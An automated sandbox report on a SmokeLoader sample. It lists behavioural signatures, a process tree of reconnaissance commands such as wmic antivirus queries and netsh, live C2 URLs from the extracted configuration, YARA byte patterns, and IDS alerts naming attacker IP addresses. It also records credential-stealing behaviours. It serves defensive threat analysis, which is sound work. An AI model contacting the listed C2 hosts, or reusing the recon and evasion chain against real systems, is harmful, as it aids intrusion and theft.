Edit tour

Windows Analysis Report
veEGy9FijY.exe

Overview

General Information

Sample name:	veEGy9FijY.exe renamed because original name is a hash value
Original sample name:	43da422957b397e2805362661ab3fd4a.exe
Analysis ID:	1524903
MD5:	43da422957b397e2805362661ab3fd4a
SHA1:	d9fcee0d2a68c509bd8fc8c30ee263de5c80b883
SHA256:	e798106229f6985b40bd436abaf516360b7d19501f0f8c1ce89a3197ebb421a4
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Found evasive API chain (may stop execution after checking mutex)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the windows firewall

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses ipconfig to lookup or modify the Windows network settings

Uses netsh to modify the Windows network and firewall settings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Execution of Suspicious File Type Extension

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

veEGy9FijY.exe (PID: 6592 cmdline: "C:\Users\user\Desktop\veEGy9FijY.exe" MD5: 43DA422957B397E2805362661AB3FD4A)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

38E5.exe (PID: 4996 cmdline: C:\Users\user\AppData\Local\Temp\38E5.exe MD5: B39D75B20F14D8DFCB2325D7082CB2B9)

BC8F.exe (PID: 2032 cmdline: C:\Users\user\AppData\Local\Temp\BC8F.exe MD5: 69C7186C5393D5E94294E39DA1D4D830)

cmd.exe (PID: 3960 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 4040 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 6348 cmdline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 4456 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 2664 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 2908 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 6276 cmdline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 6436 cmdline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 6632 cmdline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 6796 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 6980 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 2000 cmdline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 6592 cmdline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 6024 cmdline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WMIC.exe (PID: 4996 cmdline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

ipconfig.exe (PID: 5764 cmdline: ipconfig /displaydns MD5: 62F170FB07FDBB79CEB7147101406EB8)

ROUTE.EXE (PID: 1344 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)

netsh.exe (PID: 1628 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

systeminfo.exe (PID: 7128 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

tasklist.exe (PID: 5248 cmdline: tasklist /v /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

explorer.exe (PID: 6072 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 4116 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 6112 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 412 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 1340 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 1784 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

haevsid (PID: 5064 cmdline: C:\Users\user\AppData\Roaming\haevsid MD5: 43DA422957B397E2805362661AB3FD4A)

uievsid (PID: 5332 cmdline: C:\Users\user\AppData\Roaming\uievsid MD5: B39D75B20F14D8DFCB2325D7082CB2B9)

msiexec.exe (PID: 5084 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

uievsid (PID: 4084 cmdline: C:\Users\user\AppData\Roaming\uievsid MD5: B39D75B20F14D8DFCB2325D7082CB2B9)

haevsid (PID: 4548 cmdline: C:\Users\user\AppData\Roaming\haevsid MD5: 43DA422957B397E2805362661AB3FD4A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["https://calvinandhalls.com/search.php", "https://bestworldhools.com/search.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000021.00000002.4141842433.00000000005D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000022.00000002.3707478995.0000000002731000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000022.00000002.3707478995.0000000002731000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000007.00000003.2436031389.0000000000730000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000009.00000002.2753538015.00000000005D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000010.00000002.4137644244.0000000000111000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000005.00000002.1970758383.000000000273D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1220b:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1737075127.00000000025C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1737075127.00000000025C0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000007.00000002.2487596772.000000000083E000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x12bc8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.1970636946.0000000002710000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.1970636946.0000000002710000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000009.00000003.2699654261.0000000000630000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1737041120.00000000025B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000000.00000002.1737299923.000000000276D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x12dd3:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000009.00000002.2754697355.00000000006AE000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x12788:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000022.00000002.3707763574.00000000027CF000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x12073:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000007.00000002.2487198589.0000000000730000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000007.00000002.2487198589.0000000000730000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000022.00000002.3707006171.00000000025F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.1970451441.00000000025B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000007.00000002.2487104825.0000000000610000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.1970849868.00000000040E1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.1970849868.00000000040E1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000009.00000002.2754187003.0000000000651000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000009.00000002.2754187003.0000000000651000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000022.00000002.3707296343.0000000002710000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000022.00000002.3707296343.0000000002710000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000021.00000003.3713654761.0000000000630000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000021.00000002.4143586325.00000000006B2000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x12a70:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Process Memory Space: explorer.exe PID: 6112	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Process Memory Space: explorer.exe PID: 412	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Click to see the 34 entries

Unpacked PEs

Source	Rule	Description	Author
9.3.uievsid.630000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
7.2.38E5.exe.610e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
33.3.uievsid.630000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
7.2.38E5.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
33.2.uievsid.5d0e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
9.2.uievsid.5d0e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
33.2.uievsid.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
7.3.38E5.exe.730000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
9.2.uievsid.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 6592, StartAddress: 213032B0, TargetImage: C:\Users\user\Desktop\veEGy9FijY.exe, TargetProcessId: 6592

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\haevsid, CommandLine: C:\Users\user\AppData\Roaming\haevsid, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\haevsid, NewProcessName: C:\Users\user\AppData\Roaming\haevsid, OriginalFileName: C:\Users\user\AppData\Roaming\haevsid, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\haevsid, ProcessId: 5064, ProcessName: haevsid

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3960, ParentProcessName: cmd.exe, ProcessCommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , ProcessId: 2000, ProcessName: WMIC.exe

Sigma detected: Suspicious Network Command

Source: Process started

Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: route print, CommandLine: route print, CommandLine|base64offset|contains: , Image: C:\Windows\System32\ROUTE.EXE, NewProcessName: C:\Windows\System32\ROUTE.EXE, OriginalFileName: C:\Windows\System32\ROUTE.EXE, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3960, ParentProcessName: cmd.exe, ProcessCommandLine: route print, ProcessId: 1344, ProcessName: ROUTE.EXE

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T12:27:27.327428+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49736	58.151.148.90	80	TCP
2024-10-03T12:27:30.073115+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49737	58.151.148.90	80	TCP
2024-10-03T12:27:32.842482+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49738	58.151.148.90	80	TCP
2024-10-03T12:27:34.344677+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49739	58.151.148.90	80	TCP
2024-10-03T12:27:37.885580+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49740	58.151.148.90	80	TCP
2024-10-03T12:27:39.642687+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49741	58.151.148.90	80	TCP
2024-10-03T12:27:41.164522+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49742	58.151.148.90	80	TCP
2024-10-03T12:27:42.739696+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49743	58.151.148.90	80	TCP
2024-10-03T12:27:44.297714+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49744	58.151.148.90	80	TCP
2024-10-03T12:27:45.900693+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49745	58.151.148.90	80	TCP
2024-10-03T12:27:47.407549+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49746	58.151.148.90	80	TCP
2024-10-03T12:27:49.220848+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49747	58.151.148.90	80	TCP
2024-10-03T12:27:51.564100+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49748	58.151.148.90	80	TCP
2024-10-03T12:27:54.543734+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49749	58.151.148.90	80	TCP
2024-10-03T12:27:56.427760+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49750	58.151.148.90	80	TCP
2024-10-03T12:27:58.371820+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49752	58.151.148.90	80	TCP
2024-10-03T12:28:00.315752+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49753	58.151.148.90	80	TCP
2024-10-03T12:28:02.012344+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49754	58.151.148.90	80	TCP
2024-10-03T12:28:04.228656+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49755	58.151.148.90	80	TCP
2024-10-03T12:28:05.963555+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49756	58.151.148.90	80	TCP
2024-10-03T12:28:08.026781+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49757	58.151.148.90	80	TCP
2024-10-03T12:28:09.875717+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49758	58.151.148.90	80	TCP
2024-10-03T12:28:12.117152+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49759	58.151.148.90	80	TCP
2024-10-03T12:28:14.089980+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49760	58.151.148.90	80	TCP
2024-10-03T12:28:15.643400+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49761	58.151.148.90	80	TCP
2024-10-03T12:28:18.517348+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49763	58.151.148.90	80	TCP
2024-10-03T12:28:20.067001+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49764	58.151.148.90	80	TCP
2024-10-03T12:28:21.567293+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49765	58.151.148.90	80	TCP
2024-10-03T12:28:42.497186+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49766	23.145.40.162	443	TCP
2024-10-03T12:28:43.811450+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49767	23.145.40.162	443	TCP
2024-10-03T12:28:44.692225+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49768	23.145.40.162	443	TCP
2024-10-03T12:28:45.771345+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49769	23.145.40.162	443	TCP
2024-10-03T12:28:46.645029+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49770	23.145.40.162	443	TCP
2024-10-03T12:28:47.822862+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49771	23.145.40.162	443	TCP
2024-10-03T12:28:48.682002+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49772	23.145.40.162	443	TCP
2024-10-03T12:28:49.560507+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49773	23.145.40.162	443	TCP
2024-10-03T12:28:51.285309+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49774	23.145.40.162	443	TCP
2024-10-03T12:28:52.192256+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49775	23.145.40.162	443	TCP
2024-10-03T12:28:53.101813+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49776	23.145.40.162	443	TCP
2024-10-03T12:28:53.978056+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49777	23.145.40.162	443	TCP
2024-10-03T12:28:54.876440+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49778	23.145.40.162	443	TCP
2024-10-03T12:28:55.812885+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49779	23.145.40.162	443	TCP
2024-10-03T12:28:56.986884+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49780	23.145.40.162	443	TCP
2024-10-03T12:28:57.965948+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49781	23.145.40.162	443	TCP
2024-10-03T12:28:58.988741+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49782	23.145.40.162	443	TCP
2024-10-03T12:29:03.334662+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49783	23.145.40.162	443	TCP
2024-10-03T12:29:31.304807+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49784	58.151.148.90	80	TCP
2024-10-03T12:29:38.126601+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49785	58.151.148.90	80	TCP
2024-10-03T12:29:46.811497+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49786	58.151.148.90	80	TCP
2024-10-03T12:29:58.318141+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49787	58.151.148.90	80	TCP
2024-10-03T12:30:12.095185+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49788	109.175.29.39	80	TCP
2024-10-03T12:30:14.936616+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49789	23.145.40.162	443	TCP
2024-10-03T12:30:20.786073+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49790	109.175.29.39	80	TCP
2024-10-03T12:30:31.979046+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49791	23.145.40.162	443	TCP
2024-10-03T12:30:38.459805+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49792	109.175.29.39	80	TCP
